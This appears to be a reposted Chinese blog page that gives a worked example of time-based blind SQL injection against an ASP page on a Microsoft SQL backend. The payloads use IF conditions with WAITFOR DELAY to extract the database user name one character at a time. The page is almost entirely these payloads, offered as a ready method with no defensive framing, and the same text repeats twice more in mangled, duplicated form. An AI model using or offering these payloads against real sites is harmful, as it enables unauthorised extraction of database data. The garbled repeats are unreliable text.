SQL_BlindInjection[Example] 我不是女神ヾ 2022-02-03 07:25 117阅读 0赞 [`> ####################################################***nbsp; > Blind SQL Injection Syntax for extracting the USER > > 3 - Total Characters > http://***91;site***93;/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'-- > http://***91;site***93;/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'-- > http://***91;site***93;/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- > (+10 seconds) > > D - 1st Character > http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) > WAITFOR DELAY '00:00:10'-- (+10 seconds) > http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) > WAITFOR DELAY '00:00:10'-- > http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) > WAITFOR DELAY '00:00:10'-- > http://***91;site***93;/page.asp?id=1; IF > (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- > (+10 seconds) > > B - 2nd Character > http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) > WAITFOR DELAY '00:00:10'-- (+10 seconds) > http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) > WAITFOR DELAY '00:00:10'-- (+10 seconds) > > O - 3rd Character > http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) > WAITFOR DELAY '00:00:10'-- (+10 seconds) > http://***91;site***93;/page.asp?id=1; IF > (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'-- > http://***91;site***93;/page.asp?id=1; IF > (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- > (+10 seconds) > http://***91;site***93;/page.asp?id=1; IF > (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- > (+10 seconds) > http://***91;site***93;/page.asp?id=1; IF > (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'-- > http://***91;site***93;/page.asp?id=1; IF > (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- > (+10 seconds) > > Database User = DBO > > >`][_nbsp_ _ Blind SQL Injection Syntax for extracting the USER _ _ 3 - Total Characters _ http_91_site_93_page.asp_id_1_ IF _LEN_USER_1_ WAITFOR DELAY _00_00_10_-- _ http_91_site_93_page.asp_id_1_ IF _LEN_USER_2_ WAITFOR DELAY _00_00_10_-- _ http_91_site_93_page.asp_id_1_ IF _LEN_USER_3_ WAITFOR DELAY _00_00_10_-- _ _10 seconds_ _ _ D - 1st Character _ http_91_site_93_page.asp_id_1_ IF _ASCII_lower_substring_USER_1_1_97_ _ WAITFOR DELAY _00_00_10_-- _10 seconds_ _ http_91_site_93_page.asp_id_1_ IF _ASCII_lower_substring_USER_1_1_98_ _ WAITFOR DELAY _00_00_10_-- _ http_91_site_93_page.asp_id_1_ IF _ASCII_lower_substring_USER_1_1_99_ _ WAITFOR DELAY _00_00_10_-- _ http_91_site_93_page.asp_id_1_ IF _ _ASCII_lower_substring_USER_1_1_100_ WAITFOR DELAY _00_00_10_-- _ _10 seconds_ _ _ B - 2nd Character _ http_91_site_93_page.asp_id_1_ IF _ASCII_lower_substring_USER_2_1_97_ _ WAITFOR DELAY _00_00_10_-- _10 seconds_ _ http_91_site_93_page.asp_id_1_ IF _ASCII_lower_substring_USER_2_1_98_ _ WAITFOR DELAY _00_00_10_-- _10 seconds_ _ _ O - 3rd Character _ http_91_site_93_page.asp_id_1_ IF _ASCII_lower_substring_USER_3_1_97_ _ WAITFOR DELAY _00_00_10_-- _10 seconds_ _ http_91_site_93_page.asp_id_1_ IF _ _ASCII_lower_substring_USER_3_1_115_ WAITFOR DELAY _00_00_10_-- _ http_91_site_93_page.asp_id_1_ IF _ _ASCII_lower_substring_USER_3_1_105_ WAITFOR DELAY _00_00_10_-- _ _10 seconds_ _ http_91_site_93_page.asp_id_1_ IF _ _ASCII_lower_substring_USER_3_1_110_ WAITFOR DELAY _00_00_10_-- _ _10 seconds_ _ http_91_site_93_page.asp_id_1_ IF _ _ASCII_lower_substring_USER_3_1_109_ WAITFOR DELAY _00_00_10_-- _ http_91_site_93_page.asp_id_1_ IF _ _ASCII_lower_substring_USER_3_1_110_ WAITFOR DELAY _00_00_10_-- _ _10 seconds_ _ _ Database User _ DBO _ _] `***91;/LEFT***93;` `` `本文转hackfreer51CTO博客,原文链接:`http://blog.51cto.com/pnig0s1992/479423,如需转载请自行联系原作者 [_nbsp_ _ Blind SQL Injection Syntax for extracting the USER _ _ 3 - Total Characters _ http_91_site_93_page.asp_id_1_ IF _LEN_USER_1_ WAITFOR DELAY _00_00_10_-- _ http_91_site_93_page.asp_id_1_ IF _LEN_USER_2_ WAITFOR DELAY _00_00_10_-- _ http_91_site_93_page.asp_id_1_ IF _LEN_USER_3_ WAITFOR DELAY _00_00_10_-- _ _10 seconds_ _ _ D - 1st Character _ http_91_site_93_page.asp_id_1_ IF _ASCII_lower_substring_USER_1_1_97_ _ WAITFOR DELAY _00_00_10_-- _10 seconds_ _ http_91_site_93_page.asp_id_1_ IF _ASCII_lower_substring_USER_1_1_98_ _ WAITFOR DELAY _00_00_10_-- _ http_91_site_93_page.asp_id_1_ IF _ASCII_lower_substring_USER_1_1_99_ _ WAITFOR DELAY _00_00_10_-- _ http_91_site_93_page.asp_id_1_ IF _ _ASCII_lower_substring_USER_1_1_100_ WAITFOR DELAY _00_00_10_-- _ _10 seconds_ _ _ B - 2nd Character _ http_91_site_93_page.asp_id_1_ IF _ASCII_lower_substring_USER_2_1_97_ _ WAITFOR DELAY _00_00_10_-- _10 seconds_ _ http_91_site_93_page.asp_id_1_ IF _ASCII_lower_substring_USER_2_1_98_ _ WAITFOR DELAY _00_00_10_-- _10 seconds_ _ _ O - 3rd Character _ http_91_site_93_page.asp_id_1_ IF _ASCII_lower_substring_USER_3_1_97_ _ WAITFOR DELAY _00_00_10_-- _10 seconds_ _ http_91_site_93_page.asp_id_1_ IF _ _ASCII_lower_substring_USER_3_1_115_ WAITFOR DELAY _00_00_10_-- _ http_91_site_93_page.asp_id_1_ IF _ _ASCII_lower_substring_USER_3_1_105_ WAITFOR DELAY _00_00_10_-- _ _10 seconds_ _ http_91_site_93_page.asp_id_1_ IF _ _ASCII_lower_substring_USER_3_1_110_ WAITFOR DELAY _00_00_10_-- _ _10 seconds_ _ http_91_site_93_page.asp_id_1_ IF _ _ASCII_lower_substring_USER_3_1_109_ WAITFOR DELAY _00_00_10_-- _ http_91_site_93_page.asp_id_1_ IF _ _ASCII_lower_substring_USER_3_1_110_ WAITFOR DELAY _00_00_10_-- _ _10 seconds_ _ _ Database User _ DBO _ _]: http://rapidshare.com/#!download%7C579l35%7C442825249%7Cnovin-security_home_.rar%7C708
还没有评论,来说两句吧...